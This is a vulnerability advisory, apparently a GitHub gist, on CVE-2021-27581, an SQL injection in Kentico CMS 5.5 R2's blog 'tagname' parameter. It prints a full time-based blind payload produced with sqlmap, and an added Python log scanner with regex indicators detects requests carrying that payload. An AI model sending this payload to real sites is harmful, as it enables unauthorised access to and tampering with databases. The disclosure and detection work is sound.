@stasinopoulos
Created March 3, 2021 08:21
CVE-2021-27581
It was identified that the blog module in Kentico CMS 5.5 R2 (build 5.5.3996) is vulnerable to SQL injection via the “tagname” parameter, since user-controllable data is incorporated into database SQL queries in an unsafe manner.
This vulnerability can be leveraged by a potential attacker in order to interact with the back-end database and access/modify/delete stored data, interfere with application logic, escalate privileges within the database and/or potentially take control of the database server.
The vulnerability was exploited using the sqlmap tool:
* Sample url: https://target.com/blog?tagname=test&groupid=1
* Vulnerable parameter: tagname
* Type: time-based blind SQL injection
* Sample payload: tagname=test'+(SELECT CHAR(118)+CHAR(103)+CHAR(85)+CHAR(89) WHERE 1718=1718 AND 6176=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7))+'&groupid=1
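Added example, not part of the gist: a defender-side check over web-server access logs that flags requests whose decoded tagname value carries SQL fragments of the kind quoted above (quote break-out, CHAR() string building, a heavy-query join on sysusers). The log lines, indicator patterns and function names are constructed here; nothing is taken from Kentico's own code.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from the advisory). The third request carries a
# payload of the shape quoted in the gist. Note that all three return 200: a time-based
# blind injection leaves no status-code trace, so the request itself has to be inspected.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Mar/2021:08:21:01 +0000] "GET /blog?tagname=test&groupid=1 HTTP/1.1" 200 5120
203.0.113.10 - - [03/Mar/2021:08:21:02 +0000] "GET /blog?tagname=security%20news&groupid=2 HTTP/1.1" 200 4980
203.0.113.10 - - [03/Mar/2021:08:21:09 +0000] "GET /blog?tagname=test%27%2B%28SELECT%20CHAR%28118%29%2BCHAR%28103%29%20WHERE%201718%3D1718%20AND%206176%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%29%29%2B%27&groupid=1 HTTP/1.1" 200 5120
"""

# A tag name is plain text; none of these belong in it (constructed indicator set).
INDICATORS = [
    re.compile(r"'"),                                  # string-delimiter break-out
    re.compile(r"\bSELECT\b.*\bFROM\b", re.I | re.S),  # embedded subquery
    re.compile(r"\bCHAR\s*\(\s*\d+\s*\)", re.I),       # CHAR() used to assemble strings
    re.compile(r"\bsysusers\b", re.I),                 # heavy-query join on a system table
    re.compile(r"\bWAITFOR\s+DELAY\b", re.I),          # explicit MSSQL delay
]

# Combined-log request field: "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def tagname_indicators(target: str) -> list[str]:
    """Return the indicator patterns matched by the decoded tagname value(s) of a request target."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits: list[str] = []
    for raw in query.get("tagname", []):
        value = unquote(raw)  # parse_qs decoded once; a second pass catches double encoding
        hits.extend(p.pattern for p in INDICATORS if p.search(value))
    return hits


def suspicious_requests(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (request target, matched indicators) for each log line whose tagname looks injected."""
    findings: list[tuple[str, list[str]]] = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m is None:
            continue  # not a request line we understand; skip rather than guess
        hits = tagname_indicators(m.group("target"))
        if hits:
            findings.append((m.group("target"), hits))
    return findings
```

Running `suspicious_requests(SAMPLE_LOG)` flags only the third line, with four indicators matched; the two legitimate tag names pass clean.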